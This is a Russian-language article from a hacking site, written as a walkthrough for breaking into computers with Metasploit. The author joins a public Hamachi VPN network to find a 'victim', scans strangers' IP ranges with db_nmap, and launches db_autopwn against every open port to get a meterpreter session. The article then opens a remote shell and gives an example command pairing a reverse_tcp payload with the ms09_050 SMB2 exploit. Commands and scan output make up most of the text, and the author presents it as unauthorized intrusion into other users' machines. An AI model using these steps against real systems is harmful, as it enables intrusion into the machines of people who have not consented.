V-zlom.ru » Статьи » Очередная статья о взломе компа с помощью Metasploit Framework

Очередная статья о взломе компа с помощью Metasploit Framework

Всем доброго времени суток! Данную статью я посвящаю всеми известному фрэймворку Metasploit. Итак, преступим.

 

Скажу сразу, нам понадобится любая версия сканнера Nmap, ну и сам фрэймворк. Скачать который можно на сайте metasploit.com

 

На момент написания статьи в виндовой версии metasploit’а уже отсутствовал GUI интерфейс, что радует, а версия ядра была 3.4.1-dev.

 

В самом фрэймворке присутствует 552 эксплоита, чем мы и будем пользоваться.

 

Существует много разных способов взлома системы, и metasploit даёт нам возможность, не опираясь на какую-либо Ось, взламывать.

 

Мы уже установили Nmap и Metasploit, поэтому сразу запускаем msfconsole, которая в винде появилась на рабочем столе, впрочем можно запускать и из рабочей диры. Перед нами диалоговое окно…

 

Msf >

 

Для начала, необходимо подключить драйвер БД, которую мы создадим чуть позже. Она понадобится нам для хранения данных сканирования Nmap’а.

 

Msf > db_driver sqlite3

 

Затем нашу БД необходимо создать.

 

Msf > db_create Test

 

Вместо слова ‘Test’ можно написать любое слово, лишь бы радовало.

 

В ответ Метасплоит выведет инфу о том как успешно создалась БД и, впрочем, мы к ней подключились.

 

Далее следует недолговременное сканирование хоста (хостов).

 

Msf > db_nmap [опции, необходимые для скана] [наш хост]

 

Так же отмечу, что довольно проблематична у многих работа с данным фрэймворком, сидящих за NAT’ом.

 

Я как раз из их числа, поэтому я подключился к Hamachi (очень популярная VPN). Зашел в сеть Playground’а и начал искать жертву. Всё это из-за того, что адресация в Метасплоите, когда сидишь за NAT’ом, идет на твой внутренний ip, а поскольку мы действуем в рамках сети, адресация идёт на ip, который присвоил нам Hamachi.

 

Жертва найдена, и я начал скан.

 

Msf > db_nmap 5.68.22.*

 

При этом не указывая никаких дополнительных параметров только потому что в этом не было необходимости. Хотя в некоторых случаях без этого не обойтись.

 

После недлительного сканирования, Метасплоит выдал мне информацию об удалённом хосте. Выглядела она примерно так:

 

Code:

Nmap scan report for 5.132.63.54

Host is up (0.096s latency).

Not shown: 987 closed ports

PORT STATE SERVICE

80/tcp open http

135/tcp open msrpc

139/tcp open netbios-ssn

443/tcp open https

445/tcp open microsoft-ds

2869/tcp open unknown

5357/tcp open unknown

49152/tcp open unknown

49153/tcp open unknown

49154/tcp open unknown

49155/tcp open unknown

49156/tcp open unknown

49157/tcp open unknown

MAC Address: 7A:79:05:84:3F:36 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 133.49 seconds

Увидели порты, открытые на машине…

 

Далее, необходимо было убедиться, что данные попали в нашу БД Test.

 

Для этого выполняем следующую команду:

 

Msf > db_hosts

 

Метасплоит отобразит информацию, которую насканил нам Nmap.

 

Теперь сам хак.

 

Вручную чаще всего не имеет смысла подбирать сплоит, лучше оставить это дело Метасплоиту.

 

Msf > db_autopwn –p –e

 

Данная строчка означает, что Метасплоит будет атаковать машину по всем открытым портам (параметр –p за это отвечает). Так же он будет атаковать все хосты из нашей БД (параметр -e). Более детально разобраться с параметрами модуля autopwn можно, введя

 

Msf > db_autopwn –h

 

Итак, после ввода нашей команды

 

Msf > db_autopwn –p –e

 

Метасплоит принялся за работу… Начался, так сказать взлом. Он обнаружил, что 210 сплоитов подойдут к нашей жертве (должны подойти). Начинка же идёт meterpreter. Это особый, наиболее любимый, плагин, который в нагрузку несёт кучу жутко полезных возможностей.

 

После того, как Метасплоит применит все сплоиты, он начнёт их выгружать, здесь следует немного подождать. После полной его остановки, если же взлом прошел удачно, будет выведена информация об установленной сессии. Просмотреть все активные сессии можно командой

 

Msf > sessions –l

 

Видим, что метасплоит пробил Ось нашей жертвы и появилась сессия с id 1.

 

Впрочем бывает такое, он устанавливает даже 2 а то и несколько сессий с жертвой.

 

Чтобы войти с ней в непосредственный контакт, необходимо выполнить команду

 

Msf > sessions –i [id]

Msf > sessions –i 1

 

Теперь наша строчка выглядит как

 

meterpreter>

 

Вводим

 

meterpreter> help

 

видим список доступных команд.

 

Далее проверяем наши права в системе

 

meterpreter> getuid

 

И заходим в cmd

 

meterpreter> shell

 

Всё, мы в командной строке, далее всё зависит от нашей фантазии….

 

Удачного Хака [IMG]

 

Дополнительная инфа:

Описанным выше способом можно так же взламывать системы не подбором всех возможных сплоитов, а каким-нибудь одним, также можно выбрать подходящий нам Payload (начинку). Чтобы это сделать выполняем команду

 

Msf > db_autopwn –p –e –P [указываем Payload] –m [указываем наш сплоит]

 

Пример

 

Msf > db_autopwn –p –e –P windows/shell/reverse_tcp –m windows/smb/ms09_050_smb2_negotiate_func_index

 

  • Автор: makar
  • Комментарии: 0
  • Просмотры: 805
3

Добавить комментарий

Вы не авторизованы и вам запрещено писать комментарии. Для расширенных возможностей зарегистрируйтесь!